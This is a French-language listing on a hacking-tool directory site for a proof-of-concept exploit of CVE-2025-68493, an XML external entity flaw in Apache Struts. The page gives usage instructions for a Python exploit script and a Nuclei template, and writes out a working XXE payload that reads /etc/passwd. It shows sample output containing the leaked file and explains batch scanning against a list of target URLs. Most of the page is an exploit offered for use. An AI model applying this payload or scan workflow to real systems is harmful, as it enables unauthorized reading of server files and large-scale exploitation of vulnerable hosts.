Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-68493 — CVE-2025-68493 | Kitploit
Outils/GitHubGitHub/hsltz/cve-2025-68493
Scanners de VulnérabilitésAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubhsltz/cve-2025-68493

CVE-2025-68493

CVE-2025-68493

Voir le dépôt
2il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-68493

CVE-2025-68493

7. Références

[1] ApacheStrutsXWorkXML漏洞CVE-2025-68493poc及脚本 | ZONE.CI 全球网. https://zone.ci/secarticles/wx/486533.html

8. Validation et exploitation de la vulnérabilité

Pour valider et exploiter la vulnérabilité CVE-2025-68493, les scripts PoC Python et les modèles Nuclei YAML suivants peuvent être utilisés.

8.1 Utilisation du script PoC Python

Nom du script : cve_2025_68493_poc.py

Fonction : Ce script permet de valider la vulnérabilité sur une cible unique, en tentant de lire un fichier spécifique (par défaut /etc/passwd).

Prérequis :

  • Environnement Python 3
  • Bibliothèque requests (pip install requests)

Paramètres en ligne de commande :

  • -u, --url : URL de base de l'application cible (exemple : http://127.0.0.1:8080)
  • -f, --file : Chemin du fichier cible à lire (par défaut /etc/passwd)

Exemple :

root@kitploit:~
python3 cve_2025_68493_poc.py -u http://example.com:8080 -f /etc/passwd

Sortie attendue :

Si la cible est vulnérable et que le fichier est lu avec succès, le résultat ressemblera à ceci :

root@kitploit:~
[*] Testing URL: http://example.com:8080/struts2-xml-parser/xmlParserNoDtdParse
[*] Payload: <?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <foo>&xxe;</foo>
[+] Vulnerable! Successfully read /etc/passwd
----------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
----------------------------------------

8.2 Utilisation du modèle Nuclei YAML

Nom du modèle : cve-2025-68493.yaml

Fonction : Ce modèle permet de scanner plusieurs cibles en lot avec l'outil Nuclei afin de détecter la vulnérabilité CVE-2025-68493.

Prérequis :

  • Outil Nuclei installé (recommandé : v3.x ou supérieur)

Paramètres en ligne de commande :

  • -t : Chemin du fichier de modèle Nuclei
  • -u : URL d'une cible unique
  • -l : Fichier contenant plusieurs URL cibles (une par ligne)

Exemple :

Scan d'une cible unique :

root@kitploit:~
nuclei -t cve-2025-68493.yaml -u http://example.com:8080

Scan en lot :

Supposons que vous ayez un fichier nommé targets.txt contenant une URL cible par ligne :

root@kitploit:~
http://target1.com:8080
http://target2.com:8080

Exécutez la commande suivante pour un scan en lot :

root@kitploit:~
nuclei -t cve-2025-68493.yaml -l targets.txt
Télécharger l’outil